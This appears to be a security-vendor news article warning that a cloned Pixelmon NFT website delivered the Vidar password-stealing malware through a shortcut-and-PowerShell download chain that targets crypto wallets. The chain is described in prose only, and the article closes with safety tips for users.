Scam Pixelmon NFT Website Hosts Password-stealing Malware
A fraudulent website mimicking popular Pixelmon NFT lures its visitors with promises of free collectibles and tokens only to have them download and install password-stealing malware.
Pixelmon is an NFT project that has garnered a significant fanbase, counting almost 200 thousand followers on Twitter and more than 25,000 Discord members. Its popularity stems from the project's promising roadmap, which includes developing an online game in the metaverse where players can collect, train, and use Pixelmon pets to battle other players.
In this recent scam attempt, threat actors have created a copy of the original website and used it to host password-stealing malware that would drain the victims' cryptocurrency wallets. The perpetrators paid great attention to detail and replicated the website almost identically.
However, instead of providing visitors with links to a game's demo version, the faux Pixelmon website hosts malicious executables that deploy password-stealing malware on infected devices. Users would need to download a malicious archive that packs a Windows shortcut to be compromised.
Upon accessing the Windows shortcut (setup.lnk), the potential victims trigger the execution of a PowerShell script that downloads a System32.hta file from the fake Pixelmon website. As BleepingComputer reported, the System32.hta file retrieves a password-stealing malware called Vidar spotted in similar attacks in the past.
Running Vidar establishes a connection to a Telegram channel, retrieves a C2's IP address, then downloads additional configuration files and modules to steal data from compromised systems. Vidar can search for relevant files on infected devices, exfiltrate them to the threat actor's defined address, and steal passwords from apps and browsers.
This malware explicitly targets text files, crypto wallets, authentication and password files, and backups and codes. As Pixelmon is an NFT site, threat actors expect visitors to have cryptocurrency wallets installed on their systems.
To steer clear of this type of attack, users should always pay attention to the website's URL, use only official links, avoid downloading content from unknown or untrusted websites, and use dedicated solutions to scan downloaded files for suspicious content.
Scam alert: Cybercrooks use shady investment domain to scam keen investors out of money and data
May 24, 2022
John Oliver Shows the Dark Side of Data Brokerage on Last Week Tonight
April 15, 2022
Bitdefender Labs Warns of Phishing Scams Targeting MetaMask Users
April 14, 2022
Why and how to hide your IP address while traveling
April 13, 2022
How Bitdefender Can Help Restore Your Privacy in the Digital Age
April 04, 2022
How Strong is VPN Encryption?
February 28, 2022